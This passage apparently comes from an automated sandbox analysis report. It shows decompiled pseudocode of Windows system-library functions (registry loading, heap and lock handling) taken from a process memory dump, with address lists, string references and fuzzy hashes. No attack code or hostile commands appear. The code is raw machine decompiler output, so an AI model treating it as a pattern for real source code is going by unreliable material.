									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x00f2ef4b
0x00f2ef4d
0x00f2ef57
0x00f2f0bd
0x00f2f0c2
0x00f2f0d2
0x00f2f0d2
0x00f2f0c2
0x00f2ef5d
0x00f2ef5f
0x00f2ef67
0x00f2ef6a
0x00f2ef6d
0x00f2ef74
0x00f2ef7f
0x00f2ef82
0x00f2ef82
0x00f2ef86
0x00f2ef88
0x00f2ef8c
0x00f2ef8f
0x00f2ef8f
0x00f2ef8f
0x00000000
0x00f2ef91
0x00f2ef93
0x00f2efc4
0x00f2efc4
0x00f2efc4
0x00f2efca
0x00f2efd0
0x00f2f0a6
0x00000000
0x00000000
0x00f2f0af
0x00f7bb06
0x00f7bb0a
0x00f2f0b5
0x00f2f0b5
0x00f2f0b5
0x00f2f0b5
0x00000000
0x00f2efd6
0x00f2efd9
0x00f2f0de
0x00f2f0e2
0x00f2efdf
0x00f2efdf
0x00f2efdf
0x00f2efe5
0x00f7bafc
0x00f7bafc
0x00f2efe5
0x00f2efeb
0x00f2efed
0x00f2f00f
0x00f2f011
0x00f2f01a
0x00f2f01d
0x00f2f021
0x00f2f028
0x00f2f029
0x00f2f029
0x00f2f02c
0x00000000
0x00f2f02c
0x00f2eff3
0x00f2eff9
0x00f2f0ea
0x00f2f0ed
0x00f2f0ef
0x00000000
0x00f2f0ef
0x00f2f003
0x00f7bb12
0x00f2f045
0x00f2f049
0x00f2f051
0x00f2f09e
0x00f2f0a0
0x00f2f0a0
0x00f2f09e
0x00f2f053
0x00f2f064
0x00f2f064
0x00f2f06b
0x00f7bb1a
0x00f7bb1a
0x00f2f071
0x00f2f071
0x00f2f07d
0x00f2f082
0x00f2f08f
0x00f2f08f
0x00f2f009
0x00f2f00d
0x00000000
0x00f2f00d
0x00f2efd0
0x00f2ef97
0x00f2efa5
0x00f2efaa
0x00000000
0x00f2efac
0x00f2efac
0x00f2efac
0x00000000
0x00f2efb2
0x00f2f036
0x00f2f03a
0x00f2f040
0x00f2f090
0x00000000
0x00f2f092
0x00f2f042
0x00000000
0x00f2f042
0x00f2efb7
0x00f2efb9
0x00f2efbc
0x00f2efb0
0x00f2efb0
0x00000000
0x00f2efbe
0x00f2efbe
0x00f2efc1
0x00000000
0x00f2efc1
0x00f2efbc
0x00f2efaa
0x00f2ef91

Strings

iRegLoadRegistryInfo, xrefs: 00F2EF74, 00F2F05E

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: iRegLoadRegistryInfo
API String ID: 0-313553867
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: bf77d66425efc0567fefc5c0521cdab66ade4d45acb08ccf859958360bed571a
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: B3512431E04269DFDB10CB68E1D07AEBBF1AF55324F2881B8D44593282C375AD88F741

Uniqueness

Uniqueness Score: -1.00%

Function 00F4F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00F4F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				char* _v20;
				signed short* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E00F34120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E00F59830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E00F59990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E00F595D0();
							goto L11;
						} else {
							_t109 = L00F34620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E00F5F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E00F595D0();
										L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x00f4f0d3
0x00f4f0d9
0x00f4f0e0
0x00f4f0e7
0x00f4f0f2
0x00f4f0f4
0x00f4f0f8
0x00f4f100
0x00f4f108
0x00f4f10d
0x00f4f115
0x00f4f116
0x00f4f11f
0x00f4f123
0x00f4f124
0x00f4f12c
0x00f4f130
0x00f4f134
0x00f4f13d
0x00f4f144
0x00f4f14b
0x00f4f152
0x00f8bab0
0x00f8bab0
0x00f4f158
0x00f4f158
0x00f4f15a
0x00f4f160
0x00f4f165
0x00f4f166
0x00f4f16f
0x00f4f173
0x00f8baa7
0x00f8baa7
0x00f8baab
0x00000000
0x00f4f179
0x00f4f18d
0x00f4f191
0x00f8baa2
0x00000000
0x00f4f197
0x00f4f19b
0x00f4f1a2
0x00f4f1a9
0x00f4f1af
0x00f4f1b2
0x00f4f1b6
0x00f4f1b9
0x00f4f1c4
0x00f4f1d8
0x00f4f1df
0x00f4f1e3
0x00f4f1eb
0x00f4f1ee
0x00f4f1f4
0x00f4f20f
0x00f8bab7
0x00f8babb
0x00f8bacc
0x00f8bad1
0x00f4f215
0x00f4f218
0x00f4f226
0x00f4f22b
0x00000000
0x00f4f22b
0x00f4f1f6
0x00f4f1f6
0x00f4f1f9
0x00f4f1fb
0x00f4f1fb
0x00f4f1f4
0x00f4f191
0x00f4f173
0x00f4f152
0x00f4f203

Strings

@, xrefs: 00F4F124

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 4e2570315d377aa287a5bee40a52bcdf1806bba53ba41f48a1c572a9b0bb5c98
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 5E51BF715047109FC321DF18C841A6BBBF8FF88710F00892DFA9597690E7B8E914DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F93540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00F93540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x100d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E00F50BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E00F93706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E00F5FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E00F93540;
						E00F5FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E00F6DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E00FA0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E00F597C0();
					}
					return E00F5B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E00F93971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E00F93884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E00F5FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E00F59650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E00F93787(_a4,  &_v352, _t80);
						}
					}
					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E00F595D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x00f93552
0x00f9355a
0x00f9355d
0x00f93566
0x00f93567
0x00f9357e
0x00f9358f
0x00f935a1
0x00f935a5
0x00f9366b
0x00f9366b
0x00f9366d
0x00f93672
0x00f93679
0x00f93685
0x00f9368d
0x00f9369d
0x00f936a7
0x00f936b8
0x00f936c6
0x00f936c7
0x00f936dc
0x00f936e1
0x00f936e7
0x00f936e9
0x00f936e9
0x00f93703
0x00f93703
0x00f935b5
0x00f935c0
0x00f935c4
0x00000000
0x00000000
0x00f935ca
0x00f935d7
0x00f935e2
0x00f935e6
0x00f935e8
0x00f935f5
0x00f935fa
0x00f93603
0x00f93604
0x00f93609
0x00f9360a
0x00f93612
0x00f93613
0x00f9361e
0x00f93622
0x00f93628
0x00f9362f
0x00f9362f
0x00f93636
0x00f93638
0x00f9363b
0x00f93642
0x00f93642
0x00f93636
0x00f93657
0x00f93657
0x00f9365c
0x00f93662
0x00f93669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 00F9358F

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: beec4d668f6121631b1c519e565e53bda62d9db588859aad31bc93d1c48259d9
Instruction ID: 2286061e1d5f07e8a9a761a7e90f4c8915a94a9eab28eed739516515c3bc2977
Opcode Fuzzy Hash: beec4d668f6121631b1c519e565e53bda62d9db588859aad31bc93d1c48259d9
Instruction Fuzzy Hash: 3A4122F2D0052CABEF21DA50CC85FAEB77CAB44714F0045A5EA09AB241DB749F889F95

Uniqueness

Uniqueness Score: -1.00%

Function 00FE05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00FE05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				intOrPtr _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E00FE07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E00F59730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E00FDA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E00FDA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E00FE1293(_t79, _v40, E00FE07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E00F37D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E00FD138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x00fe05c5
0x00fe05ca
0x00fe05d3
0x00fe06db
0x00fe06db
0x00fe06dd
0x00fe06e3
0x00fe06e3
0x00fe05dd
0x00fe05e7
0x00fe05f6
0x00fe0600
0x00fe0607
0x00fe0610
0x00fe0615
0x00fe061a
0x00fe061c
0x00fe061e
0x00fe0624
0x00fe0625
0x00fe0627
0x00fe0628
0x00fe0631
0x00fe0640
0x00fe064d
0x00fe0654
0x00fe0654
0x00fe0631
0x00fe066d
0x00fe0674
0x00000000
0x00000000
0x00fe0692
0x00fe069e
0x00fe06b0
0x00fe06a0
0x00fe06a9
0x00fe06a9
0x00fe06b8
0x00fe06d6
0x00fe06d6
0x00000000

Strings

`, xrefs: 00FE0633

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 82d02b226e66b9f0d5bc39f79116577ea02a6c8a63a02043184428c06cd3edeb
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: E83113326043856BE720DE26CC45F9777D9BB84764F044229FA449B2C0DBB0ED54DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F53D43, Relevance: 1.4, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F53D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E00F27B60(0, _t61, 0xef11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E00F27B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						_t12 =  &(_t61[2]); // 0x5264616f
						 *((short*)( *_t12 + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L00F34620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x00f53d4c
0x00f53d50
0x00f53d55
0x00f53d5e
0x00f8e79a
0x00000000
0x00f8e79a
0x00f53d68
0x00f8e789
0x00f53d9d
0x00f53da3
0x00f53daf
0x00f53db5
0x00f53dbc
0x00f53dc4
0x00f53dc9
0x00f53dce
0x00f8e7ae
0x00f8e7ae
0x00f53dd9
0x00f53dde
0x00f53de2
0x00f53de7
0x00f53e0d
0x00f53e13
0x00f53e16
0x00f53e1e
0x00f53e25
0x00f53e28
0x00000000
0x00000000
0x00f53e2a
0x00f53e2f
0x00f53e37
0x00f53e37
0x00000000
0x00f53e37
0x00f53e31
0x00000000
0x00f53e31
0x00f53e20
0x00f53e20
0x00f53e35
0x00000000
0x00f53de9
0x00f53de9
0x00f53de9
0x00f53dee
0x00f53dfd
0x00f53dff
0x00f53e02
0x00f53e05
0x00f53e05
0x00000000
0x00f53df0
0x00f53de7
0x00f8e78f
0x00f8e794
0x00f53d79
0x00f53d84
0x00f53d89
0x00f53d8e
0x00000000
0x00f8e7a4
0x00f53d96
0x00f53d9a
0x00000000
0x00f53d9a
0x00000000
0x00f8e794
0x00f53d6e
0x00f53d73
0x00000000
0x00f8e7b5
0x00000000

Strings

RegLoadRegistryInfo, xrefs: 00F53DA2, 00F53DC2, 00F53DC3

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: RegLoadRegistryInfo
API String ID: 0-282410176
Opcode ID: 137ed31be4e5b37d58c4257f18c8595228565a2eb238abab5a56c0548c2c2e82
Instruction ID: fc69e3c0ea3b4196ca8d1a3ae6f082c9f72d5e48440e1f0ee55a7b2b6e8ec8dd
Opcode Fuzzy Hash: 137ed31be4e5b37d58c4257f18c8595228565a2eb238abab5a56c0548c2c2e82
Instruction Fuzzy Hash: 05310032A00628DBC7249F2DC842A7BBBF0EF857A1B15806AEA45CB350E730DD44E790

Uniqueness

Uniqueness Score: -1.00%

Function 00F93884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00F93884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E00F59650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L00F34620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E00F59650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x00f93893
0x00f93896
0x00f93899
0x00f9389f
0x00f938a0
0x00f938a4
0x00f938a9
0x00f938ac
0x00f938ad
0x00f938ae
0x00f938af
0x00f938b1
0x00f938b4
0x00f938bb
0x00f938bc
0x00f938bd
0x00f938c4
0x00f938c8
0x00f938ca
0x00f938ca
0x00f938d5
0x00f9393e
0x00f93940
0x00f93942
0x00f93952
0x00f93954
0x00f93961
0x00f93961
0x00f93967
0x00f9396e
0x00f9396e
0x00f93947
0x00f9394c
0x00000000
0x00f9394c
0x00f938ea
0x00f938ee
0x00f938f8
0x00f938f9
0x00f938ff
0x00f93900
0x00f93902
0x00f93903
0x00f9390b
0x00f9390f
0x00f93950
0x00000000
0x00f93950
0x00f93915
0x00f9391d
0x00f9391d
0x00f93922
0x00f93926
0x00000000
0x00f93928
0x00f9392b
0x00f9392b
0x00f93935
0x00f93937
0x00f93937
0x00000000
0x00f93935
0x00f93926
0x00f938f0
0x00000000

Strings

BinaryName, xrefs: 00F938B4

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: cb989e23d0c81fe588f546e689e0f2217415e8d5827a7bb79e01744e4c5cae73
Instruction ID: bd83452e3b2f531e2fd87419231339ff807ba1b4ed9784071f65c20d50264423
Opcode Fuzzy Hash: cb989e23d0c81fe588f546e689e0f2217415e8d5827a7bb79e01744e4c5cae73
Instruction Fuzzy Hash: 75310372D00529AFEF15DB58C946F7BB775EB80B20F114129E904A7280D770AF04E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F4D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00F4D294(signed short* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				signed char _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x100d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E00F34120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E00F5B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E00F598D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E00F595D0();
					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x00f4d29c
0x00f4d2a6
0x00f4d2b1
0x00f4d2b5
0x00f4d2b6
0x00f4d2bc
0x00f4d2bd
0x00f4d2be
0x00f4d2bf
0x00f4d2c2
0x00f4d2c4
0x00f4d2cc
0x00f4d384
0x00f4d34b
0x00f4d34f
0x00f4d350
0x00f4d351
0x00f4d35c
0x00f4d35c
0x00f4d2d6
0x00f4d2da
0x00f4d2e1
0x00f4d361
0x00f4d369
0x00f4d36d
0x00f4d2e3
0x00f4d2e3
0x00f4d2e3
0x00f4d2e5
0x00f4d2ed
0x00f4d2f5
0x00f4d2fa
0x00f4d302
0x00f4d303
0x00f4d30b
0x00f4d30f
0x00f4d313
0x00f4d318
0x00f4d31c
0x00f4d320
0x00f4d379
0x00f4d37d
0x00000000
0x00000000
0x00f8affe
0x00f8b001
0x00f8b011
0x00000000
0x00f4d322
0x00f4d322
0x00f4d330
0x00f4d337
0x00f4d35d
0x00f4d339
0x00f4d33f
0x00f4d38c
0x00f4d38c
0x00f4d33f
0x00f4d349
0x00000000
0x00f4d349

Strings

@, xrefs: 00F4D303

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: febb75218778b5bc4ed776d69883a4eef22d0c54308e5935d698f9b08028a4f4
Instruction ID: c8e59de5dbe59aa3aa0e0cae2ed00b00fc8aad45acc85e35ba53d7f0006b7bb4
Opcode Fuzzy Hash: febb75218778b5bc4ed776d69883a4eef22d0c54308e5935d698f9b08028a4f4
Instruction Fuzzy Hash: A1318FB25083059FD321DF28C981A6BBFE8EB85764F50092EF99483250D639DD08EB93

Uniqueness

Uniqueness Score: -1.00%

Function 00F21B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00F21B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E00F5BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E00F5A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
